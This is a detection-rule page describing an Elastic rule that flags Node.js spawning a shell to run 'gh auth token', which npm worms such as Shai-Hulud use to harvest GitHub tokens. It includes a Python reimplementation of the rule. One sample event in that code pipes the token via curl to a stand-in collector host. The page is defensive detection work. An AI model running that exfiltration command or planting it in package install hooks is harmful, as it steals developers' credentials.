
Summary
This detection rule, authored by Elastic, identifies the Node.js runtime spawning a shell to run the GitHub CLI command "gh auth token", which prints the GitHub token the CLI stored after "gh auth login". A malicious or compromised npm package can run this from an install hook to harvest a developer's or CI runner's GitHub token and then use it to read or modify repositories, exfiltrate source or secrets, or push further malicious changes. This behaviour was observed in the wild with the Shai-Hulud worm, which spread through compromised npm packages. The rule is scoped to Linux hosts and requires process event data from Elastic Defend. It carries a medium severity and a risk score of 47 and is written in EQL, matching process start events where the parent process is node, the child process is a shell, and the shell command line invokes "gh auth token". A hit therefore means a Node.js process executed shell commands indicative of GitHub CLI credential access. Legitimate build or release scripts that call gh from a Node.js tool can produce the same process tree, so triage should check which package or script spawned the shell and whether the token was sent anywhere. The rule is mapped to credential access and discovery techniques in the MITRE ATT&CK framework.
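The following is an added example, not Elastic's rule or its EQL query, that reimplements the detection logic described above in Python and runs it over a handful of constructed process start events. The ECS-style field names, the set of shell names, the regular expression, and all sample events are assumptions made for illustration; the real rule's exact field tests are not reproduced on this page.

```python
import re
from typing import Dict, Iterable, List

# Shell binaries whose child command lines we inspect (assumed set, not Elastic's).
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "ash"}

# Match "gh auth token" at the start of a command or after a shell separator,
# optionally with a path prefix such as /usr/bin/gh. Word boundaries prevent
# "github auth token" from matching.
GH_TOKEN_RE = re.compile(r"(?:^|[\s;&|(])(?:\S*/)?gh\s+auth\s+token\b")

# Constructed sample events modelled loosely on ECS process fields.
SAMPLE_EVENTS: List[Dict] = [
    # Malicious: node -> sh -c "gh auth token"
    {"host.os.type": "linux", "event.type": "start", "process.parent.name": "node",
     "process.name": "sh", "process.args": ["sh", "-c", "gh auth token"]},
    # Malicious: node -> bash -c "gh auth token ... | curl ..." (token piped out)
    {"host.os.type": "linux", "event.type": "start", "process.parent.name": "node",
     "process.name": "bash",
     "process.args": ["bash", "-c",
                      "/usr/bin/gh auth token --hostname github.com | curl -s -X POST -d @- https://collector.example.invalid/t"]},
    # Benign: node spawning a shell for a normal build step
    {"host.os.type": "linux", "event.type": "start", "process.parent.name": "node",
     "process.name": "sh", "process.args": ["sh", "-c", "npm run build"]},
    # Not in scope: interactive user running gh directly from bash
    {"host.os.type": "linux", "event.type": "start", "process.parent.name": "bash",
     "process.name": "gh", "process.args": ["gh", "auth", "token"]},
    # Not in scope: same pattern on a non-Linux host
    {"host.os.type": "windows", "event.type": "start", "process.parent.name": "node",
     "process.name": "bash", "process.args": ["bash", "-c", "gh auth token"]},
]


def matches_rule(event: Dict) -> bool:
    """Return True when a process start event looks like node -> shell -> gh auth token."""
    if event.get("host.os.type") != "linux" or event.get("event.type") != "start":
        return False
    if event.get("process.parent.name") != "node":
        return False
    if event.get("process.name") not in SHELLS:
        return False
    args = event.get("process.args", [])
    # The shell must have been handed a command string (-c), not a script file.
    if "-c" not in args:
        return False
    command_line = " ".join(args)
    return GH_TOKEN_RE.search(command_line) is not None


def detect(events: Iterable[Dict]) -> List[Dict]:
    """Filter a stream of process events down to those matching the rule logic."""
    return [e for e in events if matches_rule(e)]


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print("ALERT:", hit["process.parent.name"], "->", hit["process.name"],
              "|", " ".join(hit["process.args"]))
```

Running this flags the first two sample events and ignores the rest. Note that a shell is required in the middle of the process tree: the example (like the rule as summarised above) would not fire if Node.js executed the gh binary directly without a shell, so a practitioner tuning coverage may want a sibling check for node as the direct parent of gh.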
Categories
- Endpoint
- Linux
Data Sources
- Process
- Application Log
- Command
ATT&CK Techniques
- T1552
- T1528
- T1613
Created: 2025-09-18